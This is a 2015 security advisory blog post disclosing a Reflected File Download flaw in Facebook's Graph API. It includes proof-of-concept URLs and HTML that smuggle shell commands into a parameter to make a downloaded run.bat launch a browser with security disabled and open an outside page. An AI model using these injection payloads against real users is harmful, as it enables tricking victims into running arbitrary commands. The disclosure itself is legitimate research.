Facebook RFD: The final chapter

WS201505 – Facebook RFD: The final chapter
by David Sopas @dsopas
www.websegura.net

Description:

I already published a security advisory about two RFD I found on Facebook but I discovered one more and this one it’s more dangerous because it lacks any type of authentication like access_token, api_key or even an account on Facebook.

In Internet Explorer 9 you just need to run the URL:

http://graph.facebook.com/run.bat?ids=http://www.websegura.net/%22||start iexplore.exe websegura.net/malware.htm||

It downloads the file run.bat which executes Internet Explorer and opens a Websegura.net page that could be malicious [it’s not it only shows text].

facebook_rfd_ie9

On Chrome, Opera, Android Browser and Chrome for Android latest versions you need to visit a page:

https://www.facebook.com/l.php?u=http://www.websegura.net/fb.htm&h=mAQHgtP_E

Which contains the following code:

<h1>As you may notice it will download a file stored in Facebook.com</h1>
<a href="http://graph.facebook.com/run.bat?ids=%68%74%74%70%3A%2F%2F%77%77%77%2E%77%65%62%73%65%67%75%72%61%2E%6E%65%74%2F%22||start chrome websegura.net/malware.htm --disable-web-security --disable-popup-blocking||" download="run.bat">Facebook Messenger Download</a>

In the above example it downloads the file run.bat which executes Google Chrome with disable security settings and opens a Websegura.net page that could be malicious [it’s not it only shows text].

I made a small video to better describe this proof-of-concept:

Also I made a screenshot using Opera browser:
facebook_opera_rfd

On Firefox you just need to add some Javascript to the described HTML code onclick=return false; because Firefox still doesn’t understand the HTML5 download attribute.

They’re still more RFD but I think Facebook got the idea and might be tired of receiving my emails so I hope that someday they really understand the security risks that this type of vulnerability brings to all users.

Update (11 Mar 2015):

Facebook just replied:

Thank you for sharing this information with us. Although this issue does not qualify as a part of our bounty program we appreciate your report. We will follow up with you on any security bugs or with any further questions we may have.

Achaste interessante? Partilha!